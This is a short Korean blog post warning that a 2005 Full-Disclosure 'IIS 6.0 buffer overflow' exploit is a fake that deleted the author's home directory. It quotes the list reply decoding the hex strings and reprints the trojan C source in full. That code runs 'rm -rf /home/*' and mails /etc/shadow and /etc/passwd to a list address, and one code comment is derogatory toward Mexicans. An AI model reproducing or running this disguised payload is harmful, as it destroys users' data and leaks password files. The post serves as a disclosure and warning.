http://seclists.org/fulldisclosure/2005/Apr/451
IIS 6.0의 취약점을 이용해 쉘을 얻을 수 있는 코드라고 해서 TEST 해 봤는데, home 디렉터리만 날렸다.
이런 사기 코드에 당하다니 미치겠다. 쩝.
메일은 가지 않았으나, 사용자 디렉터리가 모두 삭제되어 기분이 나쁘다.
다행이 vmware 에서 실행되서 백업 이미지가 있긴 하지만, 조심해야겠다.
http://lists.grok.org.uk/pipermail/full-disclosure/2005-April/033472.html
THIS ADVISORY IS FALSE!!!!!!!!!!!!!!!!!!!!!!! "shellcode" is decoded to be: /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe "launcher" is decoded to be: cat /etc/shadow |mail full-disclosure at lists.grok.org.uk "netcat_shell" is decoded to be: cat /etc/passwd |mail full-disclosure at lists.grok.org.uk Day Jay wrote: > /* Proof of concept code > Please don't send us e-mails > asking us "how to hack" because > we will be forced to skullfsck you. > > DISCLAIMER: > !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!! > > IIS 6 Buffer Overflow Exploit > > BUG: inetinfo.exe improperly bound checks > http requests sent longer than 6998 chars. > Can get messy but enough testing, and we have > found a way in. > > VENDOR STATUS: Notified > FIX: In process > > Remote root. > > eg. > #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80 > + Connecting to host... > + Connected. > + Inserting Shellcode... > + Done... > + Spawining shell.. > > Microsoft Windows XP [Version 5.1.2600] > (C) Copyright 1985-2001 Microsoft Corp. > C:> > > > > */ > char shellcode[] = > "x2fx62x69x6ex2fx72x6dx20" > "x2dx72x66x20x2fx68x6fx6d" > "x65x2fx2ax3bx63x6cx65x61" > "x72x3bx65x63x68x6fx20x62" > "x6cx34x63x6bx68x34x74x2c" > "x68x65x68x65"; > > char launcher [] = > "x63x61x74x20x2fx65x74x63x2fx73" > "x68x61x64x6fx77x20x7cx6dx61x69" > "x6cx20x66x75x6cx6cx2dx64x69" > "x73x63x6cx6fx73x75x72x65x40" > "x6cx69x73x74x73x2ex67x72x6fx6b" > "x2ex6fx72x67x2ex75x6bx20"; > > char netcat_shell [] = > "x63x61x74x20x2fx65x74x63x2fx70" > "x61x73x73x77x64x20x7cx6dx61x69" > "x6cx20x66x75x6cx6cx2dx64x69" > "x73x63x6cx6fx73x75x72x65x40" > "x6cx69x73x74x73x2ex67x72x6fx6b" > "x2ex6fx72x67x2ex75x6bx20"; > > > main() > { > > //Section Initialises designs implemented by mexicans > //Imigrate > system(launcher); > system(netcat_shell); > system(shellcode); > > //int socket = 0; > //double long port = 0.0; > > //#DEFINE port host address > //#DEFINE number of inters > //#DEFINE gull eeuEE > > // for(int j; j < 30; j++) > { > //Find socket remote address fault > printf("."); > } > //overtake inetinfo here IIS_666666^ > return 0; > } > > > > > > __________________________________ > Do you Yahoo!? > Plan great trips with Yahoo! Travel: Now over 17,000 guides! > http://travel.yahoo.com/p-travelguide > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/
댓글 달기